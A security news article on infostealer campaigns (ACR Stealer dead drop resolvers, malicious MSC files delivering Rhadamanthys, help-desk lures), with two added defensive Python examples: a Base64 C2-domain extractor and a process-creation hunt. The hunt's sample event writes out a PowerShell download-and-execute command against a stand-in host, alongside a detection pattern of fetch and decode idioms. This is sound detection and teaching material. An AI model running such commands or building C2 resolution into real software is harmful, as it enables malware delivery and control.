Security researchers are warning about a new malware campaign that uses cracked software as a lure to distribute information stealers, specifically Lumma and ACR Stealer. The AhnLab Security Intelligence Center (ASEC) reports a sharp increase in ACR Stealer distribution since January 2025.
Dead Drop Resolver Technique
A key feature of this malware is a technique called a dead drop resolver, which lets the malware recover the address of its actual command-and-control (C2) server from a page hosted on a legitimate platform such as Steam, Telegram’s Telegraph, Google Forms, or Google Slides. ASEC explains that “threat actors encode the actual C2 domain in Base64 format on a designated page.” The malware retrieves that page, decodes the string, and uses the recovered domain as its C2. Because the first request goes to a trusted, high-reputation service, it blends in with ordinary browsing, and the operators can rotate the real C2 at any time simply by editing the page, without touching the malware already deployed.
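The resolver logic described above, written out as an added example (this is not ASEC's code or the malware's, and the page body, field layout and the C2 name under the reserved .invalid TLD are all constructed for illustration). The same routine, run over proxy captures of Steam, Telegraph or Google Forms pages, doubles as a hunting check: any Base64 run that decodes to a hostname is worth a second look.

```python
from __future__ import annotations

import base64
import binascii
import re

# Constructed stand-in for the legitimate page (Steam profile, Telegraph post,
# Google Form, ...) that the stealer fetches. The C2 name is hypothetical and
# uses the reserved .invalid TLD; it is Base64-encoded exactly as ASEC describes.
HYPOTHETICAL_C2 = "example-c2.invalid"
SAMPLE_PAGE = (
    "<html><body>\n"
    '<div class="profile_summary">Just here for the games. '
    + base64.b64encode(HYPOTHETICAL_C2.encode()).decode()
    + "</div>\n"
    # Looks like Base64 but decodes to NUL bytes; a resolver must reject it.
    "<p>AAAAAAAAAAAAAAAAAAAA</p>\n"
    "</body></html>\n"
)

# Runs of the Base64 alphabet long enough to hold a domain, with optional padding.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# RFC 1123-style hostname with at least one dot; labels 1-63 chars, no leading/trailing '-'.
HOSTNAME = re.compile(
    r"^(?=.{1,253}$)(?!-)[a-z0-9-]{1,63}(?<!-)(\.(?!-)[a-z0-9-]{1,63}(?<!-))+$", re.I
)


def candidate_domains(page: str) -> list[str]:
    """Return every Base64 token in `page` that decodes to a plausible hostname."""
    found = []
    for token in B64_TOKEN.findall(page):
        stripped = token.rstrip("=")
        padded = stripped + "=" * (-len(stripped) % 4)   # re-pad unpadded tokens
        try:
            raw = base64.b64decode(padded, validate=True)
            text = raw.decode("ascii")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue                                      # not Base64 / not text
        if HOSTNAME.match(text):
            found.append(text)
    return found


def resolve_c2(page: str) -> str | None:
    """Mimic the malware side: take the first decodable domain, or None when the
    dead drop has been taken down or no longer carries a domain."""
    domains = candidate_domains(page)
    return domains[0] if domains else None


if __name__ == "__main__":
    print("page carries:", candidate_domains(SAMPLE_PAGE))
    print("resolved C2 :", resolve_c2(SAMPLE_PAGE))
```

The hostname check is what makes the routine usable for detection: most long Base64 runs on a real page (images, session tokens) decode to binary or to text with no dot, so they are discarded, and what survives is exactly the kind of string a dead drop is designed to carry. A full hostname pattern, rather than a dot check, also keeps a resolver from being confused by a taken-down page whose replacement text happens to contain a sentence with periods.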
ACR Stealer Capabilities
ACR Stealer had previously been delivered by the Hijack Loader malware. Once running, it harvests files, web browser data, and the contents of cryptocurrency wallet browser extensions from the infected system.
MSC File Exploitation
Separately, ASEC identified another campaign that abuses files with the “MSC” extension, the saved-console format opened by the Microsoft Management Console (MMC), to deliver the Rhadamanthys stealer malware. ASEC notes that “two variants of MSC malware exist: one exploits the vulnerability in apds.dll (CVE-2024-43572), while the other executes commands using Console Taskpad.”
The attackers disguise the MSC file as an MS Word document. When the user clicks the ‘Open’ button, the file downloads and executes a PowerShell script from an external source, and that script carries the Rhadamanthys executable. Elastic Security Labs documented the technique, which it named GrimResource, in June 2024; it was exploited as a zero-day before Microsoft assigned CVE-2024-43572 and patched it in October 2024. Since a user double-clicking an MSC file launches mmc.exe, the execution chain in both variants starts with the console process itself, which is the point a defender can key on.
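A hunt for the execution chain described above (MMC launching a script interpreter that pulls code from outside the host), written as an added example rather than anything published by ASEC or Elastic. The process-creation events are constructed in a Sysmon-Event-1-like shape; the field names Image, ParentImage and CommandLine are an assumption to map onto your own telemetry, and the URL uses the reserved .invalid TLD. The marker list goes a little beyond the article's DownloadString case to cover a few other common fetch-and-decode idioms.

```python
from __future__ import annotations

import ntpath
import re

# Constructed process-creation events (Sysmon-Event-1-like). Field names are an
# assumption; the URL is hypothetical. None of these are real ASEC/Elastic samples.
EVENTS = [
    {   # the chain the campaign describes: MMC spawns PowerShell that fetches a script
        "ParentImage": r"C:\Windows\System32\mmc.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": (
            "powershell.exe -nop -w hidden -c "
            "\"IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/p.ps1')\""
        ),
    },
    {   # an administrator opening a normal console snap-in: benign
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\mmc.exe",
        "CommandLine": '"C:\\Windows\\System32\\mmc.exe" "C:\\Windows\\System32\\eventvwr.msc"',
    },
    {   # PowerShell from the desktop: noisy elsewhere, but not the parent this hunt keys on
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe Get-Process",
    },
]

# Interpreters and LOLBins that a saved console has no legitimate reason to launch.
SUSPICIOUS_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                       "wscript.exe", "cscript.exe", "rundll32.exe"}
# Command-line fragments that fetch or decode code from outside the host.
DOWNLOAD_MARKERS = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|"
    r"frombase64string|-enc(?:odedcommand)?\b",
    re.I,
)


def image_name(path: str) -> str:
    """Basename of a Windows path, lower-cased (ntpath works on any host OS)."""
    return ntpath.basename(path).lower()


def classify(event: dict) -> list[str]:
    """Reasons an event matches the MSC -> interpreter chain; empty list if it does not."""
    reasons = []
    child = image_name(event["Image"])
    if image_name(event["ParentImage"]) == "mmc.exe" and child in SUSPICIOUS_CHILDREN:
        reasons.append("mmc.exe spawned " + child)
        if DOWNLOAD_MARKERS.search(event.get("CommandLine", "")):
            reasons.append("child command line fetches or decodes remote content")
    return reasons


def hunt(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Index and reasons for every event that trips the rule."""
    return [(i, r) for i, e in enumerate(events) if (r := classify(e))]


if __name__ == "__main__":
    for index, reasons in hunt(EVENTS):
        print(f"event {index}: " + "; ".join(reasons))
```

The parent-child pair alone is a strong signal and is what catches the Console Taskpad variant, which needs no download to run a command; the command-line markers add a second, independent reason so an analyst can triage a hit without opening the raw event. Tune SUSPICIOUS_CHILDREN against a baseline of your own MMC usage before alerting on it, since some third-party snap-ins do launch helper processes.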
Exploiting Chat Support Platforms
Stealer campaigns also abuse chat support platforms such as Zendesk. Attackers pose as customers and, in the course of a support conversation, persuade support agents to download and run a stealer called Zhong Stealer, turning the help desk's own workflow of opening customer-supplied files into the infection vector.
The Scale of Compromised Systems
A recent report from Hudson Rock finds that over 30 million computers have been infected by information stealers in recent years. The stolen logs include corporate credentials and session cookies; a valid session cookie lets a buyer step into an authenticated session without the password or the MFA prompt that protected it. Cybercriminals sell these logs on underground forums, enabling further intrusions into sensitive corporate environments.
Hudson Rock states, “For as little as $10 per log (computer), cybercriminals can acquire stolen data from employees in classified defense and military sectors.” Infostealer intelligence therefore goes beyond detecting infections on one's own hosts: it means establishing which employee, contractor and third-party credentials for your environment are already circulating in these logs, and invalidating those credentials and sessions before a buyer uses them.